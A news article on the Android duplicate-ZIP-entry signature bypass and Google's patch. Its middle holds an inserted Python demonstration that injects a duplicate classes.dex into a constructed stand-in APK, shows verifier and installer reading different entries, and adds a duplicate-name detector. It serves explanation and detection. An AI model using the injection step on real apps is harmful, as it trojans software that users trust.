Google patches critical Android threat as working exploit is unleashed

A security researcher has published working exploit code that allows attackers to surreptitiously turn legitimate apps running on Google's Android mobile operating system into malicious trojans. Around the same time, Google said it released a patch that helps protect users from abuse.

As previously reported, the weakness involves the way legitimate Android applications are cryptographically signed to ensure they haven't been modified by parties other than the trusted developer. Researchers at security startup Bluebox provided high-level details of the vulnerability last week, but omitted the technical details most people would need to reproduce the attack. That didn't stop developers of CyanogenMod, an alternative Android firmware distribution, from piecing together the available details into a bug report that identifies the conditions necessary for exploiting the vulnerability. The report also incorporates Google's fix into the CyanogenMod code.

Working from that description, Pau Oliva Fora, senior mobile security engineer at viaForensics, published proof-of-concept code that allows anyone with a moderate level of skill to modify an existing Android app without changing the cryptographic signature that's supposed to certify it hasn't been tampered with. The 32-line exploit demonstrates the ease of exploiting the vulnerability and the consequences the flaw might have for people who install and update apps from third-party sources.

"I think it's a very serious vulnerability, and everyone with an unpatched device should be cautious about what they install, especially if it doesn't come from an official distribution channel," Oliva Fora wrote in an e-mail to Ars.

He went on to say the exploit works by adding new entries to an Android application package (APK) file without removing the original entries inside it. The new entries carry exactly the same file names as the originals but different content. The original entries are the ones checked against the signature, while the new entries, which can be booby-trapped with malicious code, are the ones that end up being installed and executed.

"Android fails to check the signature properly on APKs that have duplicate file names inside," Oliva Fora explained. "The entry which is verified for signature is the second one inside the APK, and the entry which ends up being installed is the first one inside the APK (the injected one, that can contain the malicious payload and is not checked for signature at all). It can be exploited by creating a specially crafted APK file that contains the properly signed files and the malicious ones."
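The mechanism Oliva Fora describes is a parser differential: two components read the same ZIP, but resolve a duplicated entry name differently. The following is an added example, not Oliva Fora's proof-of-concept and not Android code. It builds a constructed stand-in for a signed APK (a `classes.dex` plus a simplified `MANIFEST.MF` holding only a SHA-256 digest, rather than the real JAR signature's `.SF` and `.RSA` files), injects a second `classes.dex` ahead of the original, and then reads the archive through two lookup policies modelled on the quote above: a name-to-entry map where a later duplicate overwrites an earlier one (as assumed for the signature verifier), and a first-match scan of the central directory (as assumed for the installer). It also includes the check a scanner would want: any name appearing more than once in the central directory.

```python
"""Duplicate-ZIP-entry trick behind the Android "master key" bug, as an added example.

Nothing here is Android's or Oliva Fora's code; the two lookup policies are
models of the behaviour described in the article, and the APK layout is a
constructed simplification (no .SF/.RSA, SHA-256 digest only).
"""
import hashlib
import io
import warnings
import zipfile

# Constructed stand-ins for bytecode; real classes.dex files are binary blobs.
ORIGINAL_DEX = b"dex\n035\x00 constructed stand-in for the developer's real bytecode"
EVIL_DEX = b"dex\n035\x00 constructed stand-in for injected malicious bytecode"


def build_legit_apk(dex: bytes) -> bytes:
    """Build a minimal 'signed' APK: classes.dex and a manifest carrying its digest."""
    digest = hashlib.sha256(dex).hexdigest()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("classes.dex", dex)
        zf.writestr("META-INF/MANIFEST.MF", f"Name: classes.dex\nSHA-256-Digest: {digest}\n")
    return buf.getvalue()


def inject_duplicate(apk: bytes, name: str, payload: bytes) -> bytes:
    """Write the injected entry FIRST, then copy every original entry unchanged.

    The signed original entries stay in the archive, so whoever resolves the
    name to the LAST entry still sees bytes that match the manifest digest.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        dst.writestr(name, payload)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")  # zipfile warns about duplicate names
            for info in src.infolist():
                dst.writestr(info, src.read(info))  # read by ZipInfo, not by name
    return out.getvalue()


def lookup_last_wins(apk: bytes, name: str) -> bytes:
    """Model of the verifier: entries are put into a name -> entry map in central
    directory order, so a later duplicate overwrites an earlier one."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        table = {info.filename: info for info in zf.infolist()}
        return zf.read(table[name])


def lookup_first_match(apk: bytes, name: str) -> bytes:
    """Model of the installer: walk the central directory and take the first hit."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        for info in zf.infolist():
            if info.filename == name:
                return zf.read(info)
    raise KeyError(name)


def verify_digest(apk: bytes, lookup) -> bool:
    """Compare the manifest digest for classes.dex with whatever `lookup` resolves."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        manifest = zf.read("META-INF/MANIFEST.MF").decode()
    expected = manifest.split("SHA-256-Digest: ")[1].strip()
    return hashlib.sha256(lookup(apk, "classes.dex")).hexdigest() == expected


def duplicate_entry_names(apk: bytes) -> list:
    """Detection: names that occur more than once in the central directory."""
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        names = zf.namelist()
    return sorted({n for n in names if names.count(n) > 1})


def demo() -> dict:
    """Run the full scenario and report what each side of the differential sees."""
    legit = build_legit_apk(ORIGINAL_DEX)
    trojaned = inject_duplicate(legit, "classes.dex", EVIL_DEX)
    return {
        "verifier_sees_original": lookup_last_wins(trojaned, "classes.dex") == ORIGINAL_DEX,
        "verifier_accepts": verify_digest(trojaned, lookup_last_wins),
        "installer_gets_payload": lookup_first_match(trojaned, "classes.dex") == EVIL_DEX,
        "duplicates": duplicate_entry_names(trojaned),
        "legit_duplicates": duplicate_entry_names(legit),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix on the verification side is not to pick a policy but to refuse the archive outright: a ZIP whose central directory contains the same name twice has no single honest interpretation, which is exactly what `duplicate_entry_names` flags. Note that `inject_duplicate` reads entries by `ZipInfo` rather than by name; reading by name would itself fall into the last-wins trap and silently drop one copy.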

For their part, Google representatives said mitigations are in place to protect Android users against such attacks. Engineers have provided partners with a patch that's already shipping in smartphones from manufacturers such as Samsung, a Google spokeswoman said. What's more, the Google Play marketplace scans available apps for signs of the attack and Google's Verification Tool provides protection for Android users who download apps to their devices outside of Google Play. Google scanning tools have yet to uncover any evidence of the vulnerability being exploited in Google Play or other app stores.

In addition to being extremely wary of apps downloaded from third-party marketplaces, Oliva Fora said users can run a scanning app to detect whether any apps installed on a phone are exploiting the vulnerability. He said exploits can also be blocked by Android antivirus apps, although it may take time for the protection to be added to individual packages.

It's good to hear Google has already taken precautions to protect against this vulnerability. It's also worth remembering that despite the introduction 17 months ago of a service that scours Google Play for malicious apps, hackers, both whitehat and blackhat, have repeatedly found ways to bypass the measure. It also remains unclear whether the patch Google has released is available on phones from other manufacturers. Until Bluebox researchers release more details at the Black Hat security conference later this month, readers should take this threat seriously.